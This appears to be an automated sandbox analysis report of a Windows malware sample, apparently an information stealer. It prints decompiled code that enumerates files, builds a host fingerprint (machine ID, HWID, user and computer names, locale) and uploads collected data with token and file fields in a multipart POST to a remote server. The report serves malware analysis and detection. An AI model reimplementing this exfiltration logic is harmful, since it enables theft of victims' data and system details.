                                                                    				_t60 = _t63 - 0x2c;
                                                                    				 *(_t63 - 0x2a0) = 1;
                                                                    				E00415ADE(_t63 - 0x2c, _t63 - 0x26c);
                                                                    				 *((char*)(_t63 - 4)) = 2;
                                                                    				E004171FF(_t45, _t60, _t45, 1, _t60, _t65);
                                                                    				_push(1);
                                                                    				while(1) {
                                                                    					_t61 = _t63 - 0x2c;
                                                                    					 *((char*)(_t63 - 4)) = 1;
                                                                    					E0040C148(0, _t63 - 0x2c);
                                                                    					if(FindNextFileW( *(_t63 - 0x29c), _t63 - 0x298) == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t62 = _t63 - 0x2c;
                                                                    					E00415ADE(_t63 - 0x2c, _t63 - 0x26c);
                                                                    					 *((char*)(_t63 - 4)) = 3;
                                                                    					E004171FF(_t45, _t62, _t45, 0, _t62, __eflags);
                                                                    					_push(1);
                                                                    				}
                                                                    				E00404354(_t63 + 8, 1, _t38);
                                                                    				return E00420888(_t45, 0, _t61);
                                                                    			}







                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 004162B5
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,?,?,?,0040888C,?,?,?), ref: 00416109
                                                                      • Part of subcall function 004160E8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0040888C,?,?,?), ref: 0041613A
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,00000298,00410DC8,?), ref: 004162E9
                                                                    • FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 00416369
                                                                      • Part of subcall function 004171FF: __EH_prolog3.LIBCMT ref: 00417206
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharFileFindMultiWide$FirstH_prolog3H_prolog3_Next
                                                                    • String ID:
                                                                    • API String ID: 1752622786-0
                                                                    • Opcode ID: c28773b8dd60b27f57488e4eabb81f460a3f66d892f41015ff9088a6ac061fa8
                                                                    • Instruction ID: 8799f1250da60d9f85ab17e432ff239f6acf1726fd2056dc2b71a1dfac236b4c
                                                                    • Opcode Fuzzy Hash: c28773b8dd60b27f57488e4eabb81f460a3f66d892f41015ff9088a6ac061fa8
                                                                    • Instruction Fuzzy Hash: 02214471A00128DFDB10EF65CC897DEBBB8AF45304F1081AAE849E7141DB749B85CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00428C1D() {
                                                                    
                                                                    				SetUnhandledExceptionFilter(E00428BDB);
                                                                    				return 0;
                                                                    			}




                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00028BDB), ref: 00428C22
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 67d939a24982fbb68a95e007cdf1a50597145c5d941338a2e95671579e253fc0
                                                                    • Instruction ID: 7ecfbc42958421b1d7f9c8297390f43a48d1192a06683d06080191020073d669
                                                                    • Opcode Fuzzy Hash: 67d939a24982fbb68a95e007cdf1a50597145c5d941338a2e95671579e253fc0
                                                                    • Instruction Fuzzy Hash: 4A9002B035251056860417706D5E60A29E06A487067D214697105D4068DE5550005599
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E0040D87A(void* __ecx, void* __edx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t126;
                                                                    				CHAR* _t134;
                                                                    				void* _t145;
                                                                    				void* _t153;
                                                                    				void* _t168;
                                                                    				void* _t169;
                                                                    				void* _t251;
                                                                    				void* _t253;
                                                                    				long _t280;
                                                                    				void* _t287;
                                                                    				void* _t288;
                                                                    				CHAR* _t289;
                                                                    				CHAR* _t290;
                                                                    				long _t291;
                                                                    				void* _t296;
                                                                    				void* _t299;
                                                                    				CHAR* _t300;
                                                                    				long _t301;
                                                                    				void* _t306;
                                                                    				CHAR* _t307;
                                                                    				long _t310;
                                                                    				signed int _t312;
                                                                    				void* _t314;
                                                                    
                                                                    				_t296 = __edx;
                                                                    				_t312 = _t314 - 0x21f4;
                                                                    				E0042E300(0x2274);
                                                                    				_t126 =  *0x443674; // 0x393162b1
                                                                    				 *(_t312 + 0x21f0) = _t126 ^ _t312;
                                                                    				 *(_t312 - 0x5c) =  *(_t312 + 0x21fc);
                                                                    				 *((intOrPtr*)(_t312 - 0x78)) =  *((intOrPtr*)(_t312 + 0x2204));
                                                                    				 *(_t312 - 0x60) =  *(_t312 + 0x2208);
                                                                    				 *(_t312 - 0x7c) =  *(_t312 + 0x220c);
                                                                    				 *(_t312 - 0x74) =  *(_t312 + 0x2210);
                                                                    				 *(_t312 - 0x68) =  *(_t312 + 0x2214);
                                                                    				_t134 =  *0x4461e8; // 0x0
                                                                    				 *(_t312 - 0x70) = _t134;
                                                                    				_t287 = __ecx;
                                                                    				E00426300(_t312 - 0x50, 0, 0x1388);
                                                                    				E00426300(_t312 + 0x1dfc, 0, 0x1f4);
                                                                    				E00426300(_t312 + 0x1ff0, 0, 0x200);
                                                                    				 *(_t312 - 0x58) = HeapAlloc(GetProcessHeap(), 0, 0x800000);
                                                                    				E00426300(_t312 + 0x1c08, 0, 0x1f4);
                                                                    				_t145 = InternetOpenA(0, 1, 0, 0, 0);
                                                                    				 *(_t312 - 0x64) = _t145;
                                                                    				 *(_t312 - 0x6c) = 0x927c0;
                                                                    				InternetSetOptionA(_t145, 2, _t312 - 0x6c, 4);
                                                                    				_push("https://");
                                                                    				_push(_t287);
                                                                    				 *(_t312 - 0x80) = 0x100;
                                                                    				 *(_t312 - 0x54) = 0;
                                                                    				if( *0x446458() == 0) {
                                                                    					 *(_t312 - 0x54) = 1;
                                                                    				}
                                                                    				_t322 =  *(_t312 - 0x64);
                                                                    				if( *(_t312 - 0x64) != 0) {
                                                                    					_t153 = 0x10;
                                                                    					lstrcatA(_t312 + 0x1dfc, E00415EF6(_t153, _t322));
                                                                    					_t307 = "\r\n";
                                                                    					lstrcatA( *(_t312 - 0x58), _t307);
                                                                    					_t289 = "------";
                                                                    					lstrcatA( *(_t312 - 0x58), _t289);
                                                                    					lstrcatA( *(_t312 - 0x58), _t312 + 0x1dfc);
                                                                    					lstrcatA( *(_t312 - 0x58), "--");
                                                                    					lstrcatA( *(_t312 - 0x58), _t307);
                                                                    					lstrcatA(_t312 + 0x1c08, "Content-Type: multipart/form-data; boundary=----");
                                                                    					lstrcatA(_t312 + 0x1c08, _t312 + 0x1dfc);
                                                                    					_t168 = InternetConnectA( *(_t312 - 0x64),  *(_t312 - 0x5c),  *(_t312 + 0x2200), 0, 0, 3, 0, 0);
                                                                    					 *(_t312 - 0x5c) = _t168;
                                                                    					if(_t168 != 0) {
                                                                    						_push(0);
                                                                    						if( *(_t312 - 0x54) == 0) {
                                                                    							_push(0x400100);
                                                                    						} else {
                                                                    							_push(0xc00100);
                                                                    						}
                                                                    						_t169 = HttpOpenRequestA( *(_t312 - 0x5c), "POST", "/", "HTTP/1.1", 0, 0, ??, ??);
                                                                    						 *(_t312 - 0x54) = _t169;
                                                                    						if(_t169 != 0) {
                                                                    							lstrcatA(_t312 + 0x1ff0, _t289);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							_t290 = "Content-Disposition: form-data; name=\"";
                                                                    							lstrcatA(_t312 + 0x1ff0, _t290);
                                                                    							lstrcatA(_t312 + 0x1ff0, "profile");
                                                                    							_t300 = "\"\r\n\r\n";
                                                                    							lstrcatA(_t312 + 0x1ff0, _t300);
                                                                    							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x7c));
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, "------");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t290);
                                                                    							lstrcatA(_t312 + 0x1ff0, "profile_id");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t300);
                                                                    							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x74));
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, "------");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t290);
                                                                    							lstrcatA(_t312 + 0x1ff0, "hwid");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t300);
                                                                    							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x68));
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, "------");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t290);
                                                                    							lstrcatA(_t312 + 0x1ff0, "token");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t300);
                                                                    							lstrcatA(_t312 + 0x1ff0,  *(_t312 - 0x70));
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, "------");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t312 + 0x1dfc);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t307);
                                                                    							lstrcatA(_t312 + 0x1ff0, _t290);
                                                                    							lstrcatA(_t312 + 0x1ff0, "file");
                                                                    							lstrcatA(_t312 + 0x1ff0, _t300);
                                                                    							_t251 =  *0x446320( *(_t312 - 0x58));
                                                                    							_t253 =  *0x446320(_t312 + 0x1ff0);
                                                                    							_t291 = 0;
                                                                    							_t310 = _t251 +  *(_t312 - 0x60) + _t253;
                                                                    							_t301 = HeapAlloc(GetProcessHeap(), 0, _t310);
                                                                    							E00420090(_t301, _t312 + 0x1ff0,  *0x446320(_t312 + 0x1ff0));
                                                                    							E00420090( *0x446320( *(_t312 - 0x60)) + _t301, _t312 + 0x1ff0,  *((intOrPtr*)(_t312 - 0x78)));
                                                                    							E00420090( *0x446320( *0x446320( *(_t312 - 0x58))) +  *(_t312 - 0x60) + _t301, _t312 + 0x1ff0,  *(_t312 - 0x58));
                                                                    							do {
                                                                    								HttpSendRequestA( *(_t312 - 0x54), _t312 + 0x1c08,  *0x446320(_t310), _t312 + 0x1c08, _t301);
                                                                    								if(HttpQueryInfoA( *(_t312 - 0x54), 0x13, _t312 + 0x1b08, _t312 - 0x80, 0) == 0) {
                                                                    									goto L11;
                                                                    								} else {
                                                                    									_push("200");
                                                                    									_push(_t312 + 0x1b08);
                                                                    									if( *0x446458() != 0) {
                                                                    										goto L11;
                                                                    									}
                                                                    								}
                                                                    								break;
                                                                    								L11:
                                                                    								Sleep(0x7530);
                                                                    								_t291 = _t291 + 1;
                                                                    							} while (_t291 < 6);
                                                                    							while(InternetReadFile( *(_t312 - 0x54), _t312 + 0x1338, 0x7cf, _t312 - 0x60) != 0) {
                                                                    								_t280 =  *(_t312 - 0x60);
                                                                    								__eflags = _t280;
                                                                    								if(_t280 != 0) {
                                                                    									 *((char*)(_t312 + _t280 + 0x1338)) = 0;
                                                                    									lstrcatA(_t312 - 0x50, _t312 + 0x1338);
                                                                    									continue;
                                                                    								}
                                                                    								goto L16;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L16:
                                                                    				InternetCloseHandle( *(_t312 - 0x54));
                                                                    				InternetCloseHandle( *(_t312 - 0x5c));
                                                                    				InternetCloseHandle( *(_t312 - 0x64));
                                                                    				_pop(_t299);
                                                                    				_pop(_t306);
                                                                    				_pop(_t288);
                                                                    				return E0041DA9B(_t312 - 0x50, _t288,  *(_t312 + 0x21f0) ^ _t312, _t296, _t299, _t306);
                                                                    			}





























                                                                    0x0040dc65
                                                                    0x0040dc77
                                                                    0x0040dc8b
                                                                    0x0040dc99
                                                                    0x0040dca7
                                                                    0x0040dcb9
                                                                    0x0040dcc7
                                                                    0x0040dcd0
                                                                    0x0040dcdf
                                                                    0x0040dce8
                                                                    0x0040dcea
                                                                    0x0040dcfb
                                                                    0x0040dd13
                                                                    0x0040dd31
                                                                    0x0040dd59
                                                                    0x0040dd61
                                                                    0x0040dd7b
                                                                    0x0040dd9b
                                                                    0x00000000
                                                                    0x0040dd9d
                                                                    0x0040dd9d
                                                                    0x0040dda8
                                                                    0x0040ddb1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ddb1
                                                                    0x00000000
                                                                    0x0040ddb3
                                                                    0x0040ddb8
                                                                    0x0040ddbe
                                                                    0x0040ddbf
                                                                    0x0040ddeb
                                                                    0x0040ddcb
                                                                    0x0040ddce
                                                                    0x0040ddd0
                                                                    0x0040ddd2
                                                                    0x0040dde5
                                                                    0x00000000
                                                                    0x0040dde5
                                                                    0x00000000
                                                                    0x0040ddd0
                                                                    0x0040ddeb
                                                                    0x0040da5f
                                                                    0x0040da28
                                                                    0x0040de04
                                                                    0x0040de07
                                                                    0x0040de10
                                                                    0x0040de19
                                                                    0x0040de25
                                                                    0x0040de26
                                                                    0x0040de2c
                                                                    0x0040de39

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040D8E8
                                                                    • _memset.LIBCMT ref: 0040D8FB
                                                                    • _memset.LIBCMT ref: 0040D90D
                                                                    • GetProcessHeap.KERNEL32(00000000,00800000), ref: 0040D91B
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D922
                                                                    • _memset.LIBCMT ref: 0040D934
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040D944
                                                                    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040D95D
                                                                    • StrCmpCA.SHLWAPI(?,https://), ref: 0040D973
                                                                    • lstrcatA.KERNEL32(?,00000000,?,https://), ref: 0040D999
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040D9A8
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040D9B7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040D9C7
                                                                    • lstrcatA.KERNEL32(?,0043EF48,?,https://), ref: 0040D9D5
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040D9DF
                                                                    • lstrcatA.KERNEL32(?,Content-Type: multipart/form-data; boundary=----,?,https://), ref: 0040D9F1
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DA05
                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DA1D
                                                                    • HttpOpenRequestA.WININET(?,POST,0043EC2C,HTTP/1.1,00000000,00000000,00400100,00000000), ref: 0040DA54
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DA6D
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DA81
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DA8F
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DAA2
                                                                    • lstrcatA.KERNEL32(?,profile,?,https://), ref: 0040DAB4
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DAC7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DAD7
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DAE5
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DAF7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB0B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB19
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DB27
                                                                    • lstrcatA.KERNEL32(?,profile_id,?,https://), ref: 0040DB39
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DB47
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB57
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB65
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DB77
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DB8B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DB99
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DBA7
                                                                    • lstrcatA.KERNEL32(?,hwid,?,https://), ref: 0040DBB9
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DBC7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DBD7
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DBE5
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DBF7
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC0B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC19
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DC27
                                                                    • lstrcatA.KERNEL32(?,token,?,https://), ref: 0040DC39
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DC47
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC57
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC65
                                                                    • lstrcatA.KERNEL32(?,------,?,https://), ref: 0040DC77
                                                                    • lstrcatA.KERNEL32(?,?,?,https://), ref: 0040DC8B
                                                                    • lstrcatA.KERNEL32(?,0043EF3C,?,https://), ref: 0040DC99
                                                                    • lstrcatA.KERNEL32(?,Content-Disposition: form-data; name=",?,https://), ref: 0040DCA7
                                                                    • lstrcatA.KERNEL32(?,file,?,https://), ref: 0040DCB9
                                                                    • lstrcatA.KERNEL32(?,",?,https://), ref: 0040DCC7
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DCD0
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DCDF
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,https://), ref: 0040DCEE
                                                                    • HeapAlloc.KERNEL32(00000000,?,https://), ref: 0040DCF5
                                                                    • lstrlen.KERNEL32(?,?,https://), ref: 0040DD04
                                                                    • _memmove.LIBCMT ref: 0040DD13
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,https://), ref: 0040DD28
                                                                    • _memmove.LIBCMT ref: 0040DD31
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,https://), ref: 0040DD3C
                                                                    • lstrlen.KERNEL32(?,?,00000000,?,?,?,?,?,https://), ref: 0040DD4D
                                                                    • _memmove.LIBCMT ref: 0040DD59
                                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,https://), ref: 0040DD6A
                                                                    • HttpSendRequestA.WININET(?,?,00000000), ref: 0040DD7B
                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040DD93
                                                                    • StrCmpCA.SHLWAPI(?,200,?,?,?,?,?,?,?,?,https://), ref: 0040DDA9
                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,?,?,https://), ref: 0040DDB8
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,https://), ref: 0040DDE5
                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040DDFA
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE07
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE10
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DE19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Internetlstrlen$Heap_memset$CloseHandleHttp_memmove$AllocOpenProcessRequest$ConnectFileInfoOptionQueryReadSendSleep
                                                                    • String ID: "$------$200$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$HTTP/1.1$POST$file$https://$hwid$profile$profile_id$token
                                                                    • API String ID: 1373257564-2172812677
                                                                    • Opcode ID: 328f1bf75a9415e6f532aec400af0378d71ba320fe3560225c1360bcf86280cd
                                                                    • Instruction ID: 02abcd60beb62a22155f3b852405bac41b5efbc3c903587dad93e42911e77cdb
                                                                    • Opcode Fuzzy Hash: 328f1bf75a9415e6f532aec400af0378d71ba320fe3560225c1360bcf86280cd
                                                                    • Instruction Fuzzy Hash: 34F1D67680024AAFCF209FE0DC48DDE7BBDBF0A351F15043AFA06D6059DB7496498B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0040AFB3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                    				intOrPtr _t124;
                                                                    				CHAR* _t136;
                                                                    				CHAR* _t144;
                                                                    				CHAR* _t148;
                                                                    				CHAR* _t152;
                                                                    				CHAR* _t157;
                                                                    				CHAR* _t169;
                                                                    				void* _t183;
                                                                    				void* _t185;
                                                                    				CHAR* _t187;
                                                                    				void* _t192;
                                                                    				void* _t194;
                                                                    				CHAR* _t196;
                                                                    				void* _t206;
                                                                    				void* _t208;
                                                                    				CHAR* _t210;
                                                                    				void* _t215;
                                                                    				void* _t217;
                                                                    				CHAR* _t219;
                                                                    				CHAR* _t225;
                                                                    				void* _t232;
                                                                    				void* _t234;
                                                                    				CHAR* _t236;
                                                                    				void* _t265;
                                                                    				void* _t266;
                                                                    				void* _t293;
                                                                    				CHAR* _t295;
                                                                    				CHAR* _t308;
                                                                    				void* _t309;
                                                                    				void* _t323;
                                                                    				void* _t338;
                                                                    
                                                                    				_t338 = __fp0;
                                                                    				_t323 = __eflags;
                                                                    				_t293 = __edx;
                                                                    				_t265 = __ecx;
                                                                    				E0042083E(E00434B40, __ebx, __edi, __esi);
                                                                    				_t124 =  *0x4461f0; // 0x0
                                                                    				 *((intOrPtr*)(_t309 - 0x360)) = _t124;
                                                                    				_t295 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    				 *(_t309 - 0x364) = _t295;
                                                                    				E0041ED37(_t265, _t293, _t323, _t309 - 0x370);
                                                                    				_t266 = 0x364;
                                                                    				_push(_t309 - 0x370);
                                                                    				L0041E5CD(0, _t293, _t295, _t309 - 0x1b0);
                                                                    				E0041EA2E(_t266, _t309 - 0x30, 0x1e, _t309 - 0x1b0);
                                                                    				lstrcatA(_t295, "Version: ");
                                                                    				_t136 = E004083B5(_t309 - 0x154);
                                                                    				 *(_t309 - 4) = 0;
                                                                    				if(_t136[0x14] >= 0x10) {
                                                                    					_t136 =  *_t136;
                                                                    				}
                                                                    				lstrcatA(_t295, _t136);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "\n\n");
                                                                    				lstrcatA(_t295, "Date: ");
                                                                    				lstrcatA(_t295, _t309 - 0x30);
                                                                    				lstrcatA(_t295, "MachineID: ");
                                                                    				_t144 = E0041537D(_t295, _t309 - 0x154);
                                                                    				 *(_t309 - 4) = 1;
                                                                    				if(_t144[0x14] >= 0x10) {
                                                                    					_t144 =  *_t144;
                                                                    				}
                                                                    				lstrcatA(_t295, _t144);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "\nGUID: ");
                                                                    				_t301 = _t309 - 0x154;
                                                                    				_t148 = E00415326(_t295, _t309 - 0x154);
                                                                    				 *(_t309 - 4) = 2;
                                                                    				_t326 = _t148[0x14] - 0x10;
                                                                    				if(_t148[0x14] >= 0x10) {
                                                                    					_t148 =  *_t148;
                                                                    				}
                                                                    				lstrcatA(_t295, _t148);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "\nHWID: ");
                                                                    				_t152 = E00414C66(1, _t309 - 0x154, _t295, _t301, _t326);
                                                                    				 *(_t309 - 4) = 3;
                                                                    				if(_t152[0x14] >= 0x10) {
                                                                    					_t152 =  *_t152;
                                                                    				}
                                                                    				lstrcatA(_t295, _t152);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "\n\nPath: ");
                                                                    				_t157 = E00416233(_t309 - 0x154, GetCurrentProcessId());
                                                                    				 *(_t309 - 4) = 4;
                                                                    				if(_t157[0x14] >= 0x10) {
                                                                    					_t157 =  *_t157;
                                                                    				}
                                                                    				lstrcatA(_t295, _t157);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "\nWork Dir: In memory");
                                                                    				lstrcatA(_t295, "\n\n");
                                                                    				lstrcatA(_t295, "Windows: ");
                                                                    				lstrcatA(_t295, E0041527A(_t295, 0));
                                                                    				lstrcatA(_t295, " [");
                                                                    				_push(_t309 - 0x35c);
                                                                    				 *(_t309 - 0x35c) = 0;
                                                                    				_push(GetCurrentProcess());
                                                                    				if( *0x446448() == 0) {
                                                                    					L12:
                                                                    					_t169 = "x86";
                                                                    				} else {
                                                                    					_t169 = "x64";
                                                                    					_t330 =  *(_t309 - 0x35c);
                                                                    					if( *(_t309 - 0x35c) == 0) {
                                                                    						goto L12;
                                                                    					}
                                                                    				}
                                                                    				lstrcatA(_t295, _t169);
                                                                    				lstrcatA(_t295, "]\n");
                                                                    				lstrcatA(_t295, "Computer Name: ");
                                                                    				lstrcatA(_t295, E0041522A(1, _t293, _t295, 0));
                                                                    				lstrcatA(_t295, 0x43c8dc);
                                                                    				lstrcatA(_t295, "User Name: ");
                                                                    				 *(_t309 - 0x35c) = 0x101;
                                                                    				GetUserNameA(_t309 - 0x138, _t309 - 0x35c);
                                                                    				lstrcatA(_t295, _t309 - 0x138);
                                                                    				lstrcatA(_t295, 0x43c8dc);
                                                                    				_t183 = E00415442(1, _t309 - 0x18c, _t293, _t295, 0x43c8dc, _t330);
                                                                    				 *(_t309 - 4) = 5;
                                                                    				_t185 = E00404697(_t309 - 0x18c, _t309 - 0x170, "Display Resolution: ", _t183);
                                                                    				 *(_t309 - 4) = 6;
                                                                    				_t187 = E0040C20F(_t309 - 0x18c, _t309 - 0x154, _t185, 0x43c8dc);
                                                                    				 *(_t309 - 4) = 7;
                                                                    				_t331 = _t187[0x14] - 0x10;
                                                                    				if(_t187[0x14] >= 0x10) {
                                                                    					_t187 =  *_t187;
                                                                    				}
                                                                    				lstrcatA(_t295, _t187);
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				E00404354(_t309 - 0x170, 1, 0);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x18c, 1, 0);
                                                                    				_t192 = E00415522(_t309 - 0x154, _t293, _t295, 0x43c8dc, _t331);
                                                                    				 *(_t309 - 4) = 8;
                                                                    				_t194 = E00404697(_t309 - 0x18c, _t309 - 0x170, "Display Language: ", _t192);
                                                                    				 *(_t309 - 4) = 9;
                                                                    				_t196 = E0040C20F(_t309 - 0x18c, _t309 - 0x18c, _t194, 0x43c8dc);
                                                                    				 *(_t309 - 4) = 0xa;
                                                                    				_t332 = _t196[0x14] - 0x10;
                                                                    				if(_t196[0x14] >= 0x10) {
                                                                    					_t196 =  *_t196;
                                                                    				}
                                                                    				lstrcatA(_t295, _t196);
                                                                    				E00404354(_t309 - 0x18c, 1, 0);
                                                                    				E00404354(_t309 - 0x170, 1, 0);
                                                                    				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
                                                                    				E00404354(_t309 - 0x154, 1, 0);
                                                                    				lstrcatA(_t295, "Keyboard Languages: ");
                                                                    				lstrcatA(_t295, E0041593C());
                                                                    				lstrcatA(_t295, 0x43c8dc);
                                                                    				_push(_t309 - 0x154);
                                                                    				_t206 = E00415628(0, _t309 - 0x154, _t293, _t295, 0x43c8dc, _t332);
                                                                    				 *(_t309 - 4) = 0xb;
                                                                    				_t208 = E00404697(_t309 - 0x154, _t309 - 0x170, "Local Time: ", _t206);
                                                                    				 *(_t309 - 4) = 0xc;
                                                                    				_t210 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t208, 0x43c8dc);
                                                                    				 *(_t309 - 4) = 0xd;
                                                                    				_t333 = _t210[0x14] - 0x10;
